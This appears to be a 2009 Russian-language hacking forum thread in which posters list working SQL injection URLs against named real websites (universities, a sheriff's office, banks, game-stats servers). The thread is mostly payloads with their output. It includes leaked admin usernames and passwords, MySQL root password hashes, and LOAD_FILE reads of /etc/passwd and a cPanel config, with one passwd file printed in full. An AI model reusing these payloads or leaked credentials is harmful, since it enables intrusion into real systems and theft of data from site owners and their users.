Database name: stardust
User name: stardust@208.109.181.232
http://www.crawfordhanus.com/single.php?id=80980975644+union+select+1,concat_ws (0x3a,version(),user(),database()),3,4,5,6,7,8,9,1 0,11,12,13,14--
Version: 4.0.27-standard
User: crawford_gallery@localhost
Database: crawford_chphoto
.:[melkiy]:.
24.03.2009, 19:22
http://www.realtyplanex.com/estate.php?id=-20+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
Database Version: 4.1.10-standard
Database name: planexestates
User name: planexestates@localhost
Таблица users
http://www.pickereurope.org/page.php?id=-20+union+select+1,2,3,4--
Database Version: 5.0.68
Database name: picker
User name: pickeruser@localhos
http://www.baxtercountysheriff.com/page_view.php?id=-20+union+select+1,2,3,4,5,6--
Database Version: 5.0.45
Database name: bcsd_dymin
User name: bcsd@localhost
ph1l1ster
24.03.2009, 21:21
atlantic.edu
PR: 7
http://www.atlantic.edu/alumni/article.php?id=72+union+Select+1,aes_decrypt(aes_e ncrypt(concat(Version(),0x3a,Database(),0x3a,User( )),0x71),0x71),3,4,5,6,7/*
Database Version: 4.1.12-log
Database name: www_alumni_news
User name: jdagosti@localhost
reslife.rit.edu
PR: 6
http://reslife.rit.edu/publications/opendoor/article.php?id=-72+union+select+1,concat(username,0x3a,password),3 +from+users--
Database Version: 5.0.77
Database name: reslife
User name: reslife@sc3app09.rit.edu
http://www.romaniincanada.org/
http://www.romaniincanada.org/bucate/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_password,3,4,5,6,7+from+secu rity_users-- (Пароли)
http://www.romaniincanada.org/bucate/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_login,3,4,5,6,7+from+securit y_users-- (Пользователи)
admin:ch8920an
thor:ch8920an
Database Version : 5.0.75-community-log
Database name: romaniin_retete
User Name : romaniin_admin@localhost
http://www.lowcarbrecipes.org/
http://www.lowcarbrecipes.org/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_login,3,4,5,6,7+from+securit y_users-- (Пользователи)
http://www.lowcarbrecipes.org/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_password,3,4,5,6,7+from+secu rity_users-- (Пароли)
admin:8624266
Database Version : 5.0.67-community
Database name : recipedb
User Name : root@localhost
Европа Плюс - Ваше любимое радио!
http://europaplus72.ru/index.php?go=full_afisha&id=-24+union+select+1,2,3,concat(user(),0x3a,version() ,0x3a,database()),5,6--
user(): srv11964_erpusr@c11-w.ht-systems.ru
database(): srv11964_erp
version(): 5.0.75-log
PR=3
FARM.RU :: Канцелярские и офисные товары
http://www.farm.ru/region-cinfo.htm?id=-24+union+select+1,concat(user(),0x3a,version(),0x3 a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15--
user(): farm@zvm18.host.ru
database(): farm
version(): 4.0.27-log
тИЦ=275
PR=4
table users
http://www.farm.ru/region-cinfo.htm?id=-24+union+select+1,concat(login,0x3a,password),3,4, 5,6,7,8,9,10,11,12,13,14,15+from+users+limit+0,1--
login:рassword
Катерина:ubrfkuaf
IgorDorohov:Dorohov_pas
lyumna:p8yYpn
тринадцатый:6kr176e8
sm:12139
MRC-modélisme
http://www.mrcmodelisme.com/fiche_helico.php?id=-24+union+select+1,concat(user(),0x3a,version(),0x3 a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30--
user(): mrcmodelismecom@88.191.253.175
database(): mrcmodelismecom
version(): 5.0.45-Debian_1ubuntu3.3-log
PR=3
http://www.mrcmodelisme.com/fiche_helico.php?id=-24+union+select+1,table_name,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30+from+information_schema.tables+limit+0,1--
читаем таблицы.
ezo.hu - Főoldal
http://www.ezo.hu/index.php?id=24+and+substring(version(),1,1)=5--
5 ветка
PR=4
Официальный сайт института цитологии и генетики СО РАН
http://www.bionet.nsc.ru/cgi-bin/boardicg/catalog.pl?id=24+and+substring(version(),1,1)=5/*
5 ветка
тИЦ=1000
PR=5
http://www.niihim.ru/news.php?id=1+union+select+1,concat _ws(0x3a,version(),database(),user()),3,4,5--
Database Version : 4.1.22
Database name : niihim_db
User name : niihim_mysql@10.1.39.197
админ :
http://www.niihim.ru/news.php?id=1+union+select+1,concat _ws(0x3a,login,password),3,4,5+from+admin--
admin:niihim_w3
http://www.niihim.ru/admin/login.php
http://www.webaruhazak.net/cat.php?id=-50+union+select+1,2/*
Database Version: 4.1.14
Database name: wscenter
User name: wscenter@localhost
2 Metis
http://www.lowcarbrecipes.org тама и load_file
cpanel
http://www.lowcarbrecipes.org/index.php?m=recipes&a=search&search=yes&course_id=-7+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x 7873716C696E6A626567696E,LOAD_FILE(0x2F7661722F637 0616E656C2F6370616E656C2E636F6E666967),0x7873716C6 96E6A656E64),0x71),0x71),3,4,5,6,7--
DezMond™
25.03.2009, 00:04
http://www.jcp-pt.org/noticias.php?id=-420+union+select+1,2,3,version(),5,6,7/*&categoria=3&categoria2=0&categoria3=0
http://www.eduff.uff.br/noticias.php?id=-408+union+select+1,2,3,version()/*
M.W.N.N.
25.03.2009, 00:19
http://kvs.gov.ua/info/news/news.php?id=17+union+select+1,2,concat(version(),0 x3a,database(),0x3a,user()),4,5/*
version():4.1.22
database():kvsgov
user():u_kvsgov@localhost
.:[melkiy]:.
25.03.2009, 00:32
http://www.propertysalecenter.com/fullnews.php?id=-20+union+select+1,2,3,4,5--
Database Version: 5.0.75-community-log
Database name: manwomen_propertysalecenter
User name: manwomen_coy0@localhost
ph1l1ster
25.03.2009, 01:52
threeoneg.com
Database Version: 5.0.45
Database name: threeone_catalog
User name: threeone_catalog@localhost
http://www.threeoneg.com/31G/shop.php?action=view&id=-17+union+select+1,2,concat(user(),0x3a,version(),0 x3a,database()),4,5,6,7,8,9
ravenfiles.com
Database Version: 4.1.22-standard
Database name: rgnmain1_ravenfiles
User name: rgnmain1_admin@localhost
http://www.ravenfiles.com/file.php?id=-14+union+Select+1,concat(user(),0x3a,version(),0x3 a,database()),3,4,5,6,7,8,9,0,11
expovest.ro
Database Version: 4.1.22-log
Database name: db16796
User name: u16796@81.28.232.69
http://www.expovest.ro/general_en/news.php?id=-173+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(us er(),0x3a,version(),0x3a,database())
businessmachine.ro
Database Version: 5.0.45
Database name: bm
User name: bmadm@localhost
http://www.businessmachine.ro/afaceri/news.php?id=-51+union+select+1,concat(username,0x3a,userpass),3 ,4,5+from+users
gts-automatizari.ro
P.S: admin:21232f297a57a5a743894a0e4 (какой тип хэша?)
Database Version: 5.0.67-community-log
Database name: gtsautom_web
User name: gtsautom_web@localhost
http://www.gts-automatizari.ro/industrial-automation/news.php?lg=1&id=-51+union+select+1,2,3,4,concat(user,0x3a,passwd),6 ,concat(user,0x3a,passwd),8,9,0,1,2,3+from+gts_adm in
ПаВлУшКа
25.03.2009, 02:25
http://www.mairie-yako.bf/site/suite.php?id=-101+union+select+1,2,version(),table_name,5+from+i nformation_schema.tables--
http://www.lovea2.com/php/tourguide.php?id=-6+union+select+1,version(),3--
nazgul_mk
25.03.2009, 05:42
SlavutichCity.net
http://slavutichcity.net/modules.php?op=modload&name=Subjects&file=index&req=listpages&subid=-1+union+select+1,concat(database(),0x3a,version(), 0x3a,user()),3/*
database(): slavutic_postnuke
version(): 4.1.22-standard
user(): slavutic_pnuker@localhost
ADMIN:
Boroda:gjhnfk
Assembler
25.03.2009, 11:18
http://www.globaltown.ru
PR:1
Version: 5.0.67
http://www.globaltown.ru/vip.php?id=99999999999999%20union%20select%201,ver sion(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23--
spherics
25.03.2009, 17:23
Во как!
PageRank - 8
http://www.osu.edu/news/newsitem23798698757/**/union/**/select/**/1,2,concat_ws(0x3a,version(),user(),database()),4, 5,6,7,8,9,10,11,12,13,14,15,16--
Database Version: 5.0.27-log
Database name: news_db
User name: ted@www5.it.ohio-state.edu
http://www.osu.edu/news/newsitem23798698757/**/union/**/select/**/1,2,concat_ws(0x3a,user,password),4,5,6,7,8,9,10,1 1,12,13,14,15,16/**/from/**/mysql.user--
: localhost : root : *C5FA920219C3170214E8A086CC776FAB477B1A8A : Y
: 128.146.216.181 : root :*C5FA920219C3170214E8A086CC776FAB477B1A8A : Y
: 128.146.216.88 : root :*C5FA920219C3170214E8A086CC776FAB477B1A8A : Y
: % : ted : 625b56912caa4d12 : Y
: % : ds0migr : 646fe4840b38d1d0 : Y
: 128.146.% : replication : *CF8D157B64E2424E308A4724ABAECBF189EE1B2D : N
Читаем etc/passwd
http://www.osu.edu/news/newsitem23798698757/**/UNION/**/SELECT/**/1,2,CONCAT(0x3a,LOAD_FILE(0x2F6574632F706173737764 ),0x3a),4,5,6,7,8,9,10,11,12,13,14,15,16--
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
spot:x:500:500:NISS spot account:/home/spot:/bin/bash
amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash
oracle:x:501:501::/usr/local/oracle:/bin/bash
mysql:x:101:101::/home/mysql:/bin/bash
zabbix:x:60:60::/tmp:/sbin/nologin
DezMond™
25.03.2009, 17:25
http://www.alternativa3.com/2006/noticias.php?id=-690'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
.:[melkiy]:.
25.03.2009, 17:50
Интернет-магазин светильников
http://isvet.ru/products.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11--
Database Version: 4.1.11-Debian_4sarge5-log
Database name: z34890_isvet
User name: z34890_isvet@77.221.130.6
Login: silsergey
Pass: 8e4e4aae7d65051f3424b4fba909a00f : cgiperl
PR: 6
тИЦ: 850
http://yspu.yar.ru/service/dissert/?_mode=3&idDis=-1+UNION+SELECT+1,2,convert(concat_ws(0x3a,+user(), +version(),+database())+using+cp1251),4,5,6,7,8,9, 10,11,12,13,14/*
User name: dissert@localhost
Database version: 4.1.14-log
Database name: Dissert
spherics
25.03.2009, 20:29
PR - 6
http://www.rlc.edu/pressroom/newsstory.php?id=902'%20and%20@@version%3E1--%20and%20'1'='1
Version : Microsoft SQL Server 2000 - 8.00.760 (Intel X86)
Dec 17 2002 14:22:05
Copyright (c) 1988-2003 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://www.rlc.edu/pressroom/newsstory.php?id=902'%20and%20db_name()%3E0--%20and%20'1'='1
Db Name : WebDB
http://www.rlc.edu/pressroom/newsstory.php?id=902'%20and%20user%3E0--%20and%20'1'='1
Current User : phpuser
http://www.bspu.ru/index.php?module=Topics&func=view&topicid=-1+UNION+SELECT+1,pn_uname,pn_email,4,5,pn_pass+fro m+md_users+limit+1,1/*
Database version: 4.0.27-standard-log
Database name: bspu
User name: bspu@localhost
http://www.disco.bg/designs/classic2_en.php?id=-192+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64, 65,66,concat_ws(0x3a,version(),database(),user()), 68,69,70,71--
Database Version: 5.0.67-community-log
Database name: discobg_disco
User name: discobg_site2@localhost
http://www.invitro-marketing.com/projects_details.php?id=-32+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),user())&start=0&client=&type=-1&type_service=-1
Database Version: 5.0.67-community
Database name: invitro_Invitro
User name: invitro_site@localhost
mailbrush
26.03.2009, 11:52
Все инъекции чекнутые моим Антибояном (http://bestquest.info/php/check.php), после чего добавлены в его же базу.
http://q3.bpnet.ru/themes/bismarck/gamestat.php?gameID=121269546138015100+union+selec t+concat_ws(0x3a,user(),database(),version()),2/*&config=cfg-default.php
user() : database() : version()
root@localhost:vsp:4.1.22-log
http://q3.bpnet.ru/themes/bismarck/gamestat.php?gameID=-1+union+select+user,file_priv+from+mysql.user+/*&config=cfg-default.php[/code]
file_priv = Y
http://q3.bpnet.ru/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,2+/*&config=cfg-default.php
/etc/passwd
http://q3.tupoleva.net/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
user() : database() : version()
vsp@localhost : vsp : 4.1.22
http://195.222.33.230/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
user() : database() : version()
cod2_stats@localhost : vsp : 4.1.20-community-nt
http://partymanproductions.com/WolfStats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
user() : database() : version()
joatmon@localhost : joatmon_wolfstat : 5.0.37-standard
http://quake3.perm.ru/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
user() : database() : version()
quake3@localhost : quake3 : 5.0.32-Debian_7etch8-log
http://nlcgaming.aj-services.com/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
user() : database() : version()
apcyberax@localhost : nlcgaming : 5.0.45
file_priv=Y
http://nlcgaming.aj-services.com/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,2&config=cfg-default.php
/etc/passwd
http://www.cumberlandcollege.sk.ca/Slaterz/codstats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
user() : database() : version()
root@localhost : vsp : 5.0.27
http://www.cumberlandcollege.sk.ca/Slaterz/codstats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+user,file_priv+from+mysql.user&config=cfg-default.php
file_priv=Y
http://www.cumberlandcollege.sk.ca/Slaterz/codstats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,file_priv+from+mysql.user&config=cfg-default.php
/etc/passwd
http://railwhore.com/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
user() : database() : version()
brianyo_grunge@216.157.132.2 : brianyo_vmstats : 4.0.2
http://www.slquake.com/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
user() : database() : version()
dbo260613578@74.208.16.225:db260613578:4.0.27-max-
http://krautz.clanserver4u.de/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
user() : database() : version()
db_59449_1@DE-FFM-WS-01.clanserver4u.de:ws_59449_1:5.0.51a-24-log
http://www.dailycod.com/vsp/cod2/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
user() : database() : version()
vsp@localhost : vsp : 5.0.67-log
http://cybercubic.com/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
user() : database() : version()
root@localhost : ccvsp : 5.0.27
http://cybercubic.com/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+user,file_priv+from+mysql.user&config=cfg-default.php
file_priv=Y
http://cybercubic.com/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,2&config=cfg-default.php
/etc/passwd
http://www.enolan.info/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
user() : database() : version()
vsp_q3@biggs.dreamhost.com:q3db_3w:5.0.67-log
ГАВ
http://www.murrayky.gov/showevent.htm?ID=9012001+union+select+1,2,version( ),user(),5,6,7,8,9,10,11,12,13,14,15/*
Version: 5.0.24
Username: citybusiness@localhost
Dbname: citybusiness
http://www.maket.eu/products.php?product_id=-56+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8,9,10,11,12&id=3&start=5
Database Version: 5.0.67-community
Database name: maketeu_maket
User name: maketeu_site@localhost
mailbrush
26.03.2009, 14:53
Все инъекции чекнутые моим Антибояном (http://bestquest.info/php/check.php), после чего добавлены в его же базу.
http://fpsgamer.jp/vsp/tourney2/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
bsan@localhost:vsp:5.0.32-Debian_7etch6-log
http://fpsgamer.jp/vsp/tourney2/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,2&config=cfg-default.php
/etc/passwd
file_priv=Y
http://www.fragginrockets.org/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
oopsie_vsp@localhost:oopsie_vsp:5.0.45
http://stats.etbunker.com/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
etbunker_forums@localhost:etbunker_vspstats:4.1.22-standard
http://cod.wck.biz/stats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
root@localhost:codstats2:5.0.32-Debian_7etch8-log
http://cod.wck.biz/stats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,2&config=cfg-default.php
/etc/passwd
file_priv=Y
http://www.teamnachtjager.net/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
quake3@localhost:vsp_bq3:5.0.45
http://biohazard.moyse.net/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
root@localhost:biohazard_stats:5.0.32-Debian_7etch8-log
http://biohazard.moyse.net/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,2&config=cfg-default.php
/etc/passwd
file_priv=Y
http://q3stats.siberianet.ru/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
q3@89.105.136.130:q3:5.0.77-log
http://www.4fclan.com/VSP/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
nruclan_svstats@localhost:nruclan_4Fstats:4.1.22-standard-log
http://www.awe-clan.com/vsp3/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
aweclanc_neilemm@localhost:aweclanc_stats3:5.0.75-community-log
http://dmpstats.rko.nu/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
dmpstats@77.232.80.111:dmpstats:5.0.67
http://stats.s4ndmod.com/aoastats/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
headshotsniping@64.202.166.233:headshotsniping:4.0
M.W.N.N.
26.03.2009, 15:03
http://www.itoamerica.com/index.php?section=pdf&id=325+union+select+version(),2,3,4+limit+1,1/*
version():4.1.20
database():itoamerica
user():root@localhost
http://www.priderentals-bg.com/priderentals/property_info.php?idproperty=-55+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41,42,concat_ws(0x3a,ve rsion(),database(),user())
Database Version: 5.0.67-community
Database name: pridebg_pride
User name: pridebg_pridebg@localhost
mailbrush
26.03.2009, 15:24
Все инъекции чекнутые моим (и вашем тоже) Антибояном (http://bestquest.info/php/check.php), после чего добавлены в его же базу.
http://xinul.org/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
vsp-stat@localhost:vspstat:5.0.32-Debian_7etch8-log
http://montekidlo.org.ua/stat/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
root@localhost:vsp:5.0.51a
http://montekidlo.org.ua/stat/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,2&config=cfg-default.php
/etc/passwd
file_priv=Y
http://www.etozclan.com/stats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
etozclan_stats@localhost:etozclan_vspstats:4.1.22-standard
http://games.zir.net/vsp/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
ethost1@localhost:ethost1_vsp
http://www.fsk-clan.de/stats1/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
chris@localhost:vsp1:5.0.24a-Debian_9ubuntu2-log
http://www.fsk-clan.de/stats1/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,2&config=cfg-default.php
/etc/passwd
file_priv=Y
http://www.3val.ru/games/cod2/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
root@localhost:cod2stats:5.0.51b-community-nt-log
file_priv=N
M.W.N.N.
26.03.2009, 16:59
http://www.apsira.com/loans/bank.php?bankId=10+union+select+1,version(),3,4,5, 6,7,8,9,10,11,12,13,14+limit+1,1
version():5.0.75-community-log
database():jadianor_ap
user():jadianor_apsira@localhost
__
http://www.guardian-bank.com/webinfo.php?main=11+union+select+1,2/*
version():5.0.45
database():guardiankdb
user():guardianb#@localhost
http://www.guardian-bank.com/webinfo.php?main=11+union+select+1,2+from+users/*
__
http://www.arch-no.org/News.php?mode=read&id=271+union+select+1,2,3,4,concat(version(),0x3a, database(),0x3a,user()),6,7+limit+1,1/*
version():5.0.22-Debian_0ubuntu6.06.11-log
database():archno
user():archno@localhost
__
http://www.icallsofts.com/productdetails.php?id=12+union+select+1,concat(ver sion(),0x3a,database(),0x3a,user()),3,4,5,6,7,8/*
version():4.1.22-standard-log
database():ishgod_softwares
user():ishgod_softwares@66.40.52.25
__
http://www.ideas-bank.ru/trening.php?id=61+union+select+1,2,3,4,5,6,7,8,9,1 0,11+limit+1,1/*
__
http://www.7days.ae/storydetails.php?id=75189%27+union+select+1,concat (version(),0x3a,database(),0x3a,user()),3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+l imit+1,1/*
version(): 5.0.45
database():sevendaysdb
user():sevendaysdb@localhost
Blind SQL, ebscohost.com PR=9
!
http://www.ebscohost.com/customerSuccess/default.php?id=253+and+substring(@@version,1,1)=4 ===> False
http://www.ebscohost.com/customerSuccess/default.php?id=253+and+substring(@@version,1,1)=5 ===> True
не баян
spherics
26.03.2009, 17:11
http://www.ctl.mnscu.edu/events/cfp/RSPsessiondetail.php?id=98098765046+union+select+c oncat_ws(0x3a,version(),user(),database()),2,3,4,5 ,6,7,8,9,10,11,12--&confID=152
Database Version: 5.0.21
Database name: ctl_events
User name: ctl_RSP@hera.mnscu.edu
www.loria.fr PR - 7
http://intoweb.loria.fr/ProtosRecherche/IntoBib/AfficheDocument.php?Id=2809809700+union+select+con cat_ws(0x3a,version(),user(),database()),2--
Database Version: 4.0.14
Database name: WebStress
User name: root@raival.loria.fr
Читаем etc/passwd
http://intoweb.loria.fr/ProtosRecherche/IntoBib/AfficheDocument.php?Id=2809809700+UNION+SELECT+CON CAT(0x3a,LOAD_FILE(0x2F6574632F706173737764),0x3a) ,2--
Читаем /etc/issue
http://intoweb.loria.fr/ProtosRecherche/IntoBib/AfficheDocument.php?Id=2809809700+UNION+SELECT+CON CAT(0x3a,LOAD_FILE(0x2F6574632F6973737565),0x3a),2--
Mandrakelinux release 10.2 (Limited Edition 2005) for i586
Kernel 2.6.11-6mdk on an i686
mailbrush
26.03.2009, 18:06
TELO, посмотри-ка сюда http://www.google.com/search?client=opera&rls=en&q=hardvision.ru+site:forum.antichat.ru&sourceid=opera&ie=utf-8&oe=utf-8. Видишь сколько раз уже выкладывали скули на этот сайт? И если минуса не хочешь получить, будь добр, чекай все на Антибояне (http://localhost.ua/sql/check.php) Не зря же я его создавал.
http://valksfun.nl/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
valksfun@localhost:valksfun_main:4.1.21-standard
http://proxy.doomwarriors.de/27961/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
vsp@localhost:vsp:5.0.27
http://ext.kubnet.lnetw.ru/q3a/stats/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
vsp@localhost:vsp:5.0.51a-log
http://www.dev1ance.net/desire/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
root@localhost:vspfreeze:4.0.24-standard
http://www.dev1ance.net/desire/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,2&config=cfg-default.php
/etc/passwd
file_priv=Y
http://cs.uch.net/q3stat/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
cs16@localhost:q3:5.1.30
http://urt.voxel.net/stats/ffa/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
ffa@localhost:ffa:5.0.45
http://urt.voxel.net/stats/ffa/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,2&config=cfg-default.php
/etc/passwd
file_priv=Y
http://quake.academ.org/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
quake@85.118.224.19:q3_stats_vsp:5.0.32-Debian_7etch5-log
http://miguel-lopez.com/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
mmarti1_vspuser@216.157.150.128:mmarti1_vsp:4.0.26
http://vsp.goodguysclan.net/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
goodguys@localhost:goodguys:5.0.32-Debian_7etch6
http://tacticalinstinct.com/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
TacticalInstinct@localhost:TacticalInstinctScore:5 .0.22-Debian_0ubuntu6.06.6-log
http://www.brainyminds.com/client.php?id=-3/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/**//*
Database Version: 4.1.20
Database name: ssmith_bm
User name: ssmith_brainy@localhost
http://www.nlpplanning.com/client.php?id=-8/**/UNION/**/SELECT/**/1,2/**/l/*
Database Version: 4.0.30-log
Database name: u10001284
User name: u10001284@lon1-webmysql-1.msh.demon.net
